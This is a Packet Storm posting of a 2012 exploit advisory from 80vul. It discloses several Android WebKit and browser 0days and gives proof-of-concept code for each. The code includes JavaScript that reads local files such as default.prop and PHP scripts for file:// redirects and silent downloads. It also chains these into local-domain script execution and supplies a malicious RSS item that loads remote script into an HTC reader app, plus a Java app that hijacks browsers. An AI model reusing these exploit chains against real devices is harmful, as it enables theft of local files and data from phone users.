what you don't know can hurt you

Android Webkit XSS / Cross Domain Issues

Android Webkit XSS / Cross Domain Issues
Posted Feb 8, 2012
Authored by 80vul | Site 80vul.com

Android suffers from multiple cross site scripting, cross domain, auto file download and cross protocol vulnerabilities.

tags | exploit, vulnerability, protocol, xss
MD5 | a5188b0eff042c2832d8d4466813b51c

Android Webkit XSS / Cross Domain Issues

Change Mirror Download
Android  Multiple  Vulnerabilities

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt


Ph4nt0m Webzine 0x06 has been
released[http://www.80vul.com/webzine_0x06/],there
three papers on the android application security about the development
environment,browser security, inter-application communication.And published
a lot of 0days:

[0day-NO.0] android-webkit local cross-domain vulnerability

android-webkit allow local html files cross any http domain and the local
file.demo:

<script>
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
'Microsoft.XMLHTTP',
'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0',
'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}

xmlhttp=request;

//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;

alert(ret);
</script>

[0day-NO.1] android-webkit cross-protocol vulnerability

this vul allow cross to the file protocol from http. demo:

<iframe name=f src="location.php" ></iframe>
<script>
function init(){
f.location = "file:///default.prop";
}
setTimeout(init,5000)
</script>

location.php codz:
<?php
header("Location:file:///80vul.com");
?>

[0day-NO.2] android-webkit file:// protocol xss vulnerability

ON android-webkit File:// protocol, the lack of filtering on the directory
and file name,Lead to cross-site scripting attacks. demo:

visit this : file:///80vul.com/<script>alert(1);</script>

[0day-NO.3] android-browser/firefox auto download the file vulnerability

android-browser/firefox Handle the Content-Disposition: attachment, lack of
safety tips.So through this vul allows users to automatically download the
evil html file to the local directory.

test this code:

<?
//autodown.php
header("Content-Disposition: attachment:filename=autodown.htm");
$data=<<<android_xss_go
<script>alert(/xss/);</script>
android_xss_go;
print $data;
?>

the local file name and the path:

android 1.x --> /sdcard/download/autodown.html
android 2.x-3.x --> /sdcard/download/autodown.htm
android 4.0 --> /sdcard/download/autodown.php
firefox --> /sdcard/download/autodown.php

So,Let's play a jigsaw puzzle:

POC[1]:
//[0day-NO.1]+[0day-NO.2]
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";
}
setTimeout(init,5000)
</script>

POC[2]:
//[0day-NO.1]+[0day-NO.3]
<meta http-equiv="refresh" content="0;URL=autodown.php"/>
<iframe name=f src="location.php" ></iframe>
<script>
function init(){
f.location = "file:///sdcard/Download/autodown.htm";
}
setTimeout(init,5000)
</script>

Now ,We can execute arbitrary js code on the local domain, and we can cross
any http domain and the local file used [0day-NO.0].

and go on ...

[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability

By controlling the second argument of webview.loadDataWithBaseURL(),can
cross the file:// protocol use javascript,like
<script>window.location='file://///default.prop';</script> .so the dome apk
demo:

WebView webview;
webview = (WebView) findViewById(R.id.webview);
webview.getSettings().setJavaScriptEnabled(true);
webview.setWebChromeClient(new WebChromeClient());
String
data="80vul<script>window.location='file://///default.prop';</script>";
webview.loadDataWithBaseURL("http://www.baidu.com/", data,
"text/html", "utf-8", null);


[0day-NO.5] com.htc.googlereader XSS vulnerability

com.htc.googlereader is an app on HTC Mobile [G10], there is a xss vul on
this app, then Decompilation and Found this codz:

label399: String str = this.mHeadlineShown.getSummary();
if (str.trim().contains("<iframe"))
{
this.mWebView.loadData(str, "text/html", "utf-8");
break label246;
}
this.mWebView.loadDataWithBaseURL("http://", str, "text/html",
"utf-8", null);
break label246;

the "str" have no filter and can be controlled by evil RSS:


<item>
<guid>http://www.80vul.com</guid>
<title>0day-NO.5</title>
<link>http://www.80vul.com</link>
<description><![CDATA[aa<script src='
http://www.80vul.com/xss.js'></script>]]></description>
<dc:creator>80vul</dc:creator>
<category>anddoid</category>
<pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate>
</item>

When opens the unread status of the rss, u can get the XSS vul. and this
is mWebView.loadDataWithBaseURL(),so can cross file:// by [0day-NO.4].


[0day-NO.6] Some Browsers for android Cross-Application Scripting
Vulnerability

the evil app can cross browser and execute arbitrary js code on the local
domain. the demo app codz:

//codz base on http://blog.watchfire.com/files/advisory-android-browser.pdf
package com.x;
//opera
//com.opera.browser com.opera.Opera

//firefox
//org.mozilla.firefox org.mozilla.firefox.App

//android
//com.android.browser com.android.browser.BrowserActivity

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class TesttestActivity extends Activity {
static final String mPackage = "com.android.browser";
static final String mClass = "com.android.browser.BrowserActivity";
static final String gomPackage = "com.opera.browser";
static final String gomClass = "com.opera.Opera";
static final String mUrl = "http://www.80vul.com/autodown.php";
static final int mSleep = 15000;
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
startBrowserActivity(mUrl);
try {
Thread.sleep(mSleep);
}
catch (InterruptedException e) {}
startBrowserActivitygo("file:///sdcard/Download/g.htm");
}
private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mClass));
res.setData(Uri.parse(url));
startActivity(res);
}
private void startBrowserActivitygo(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(gomPackage,gomClass));
res.setData(Uri.parse(url));
startActivity(res);
}
}

hitest

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    1 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close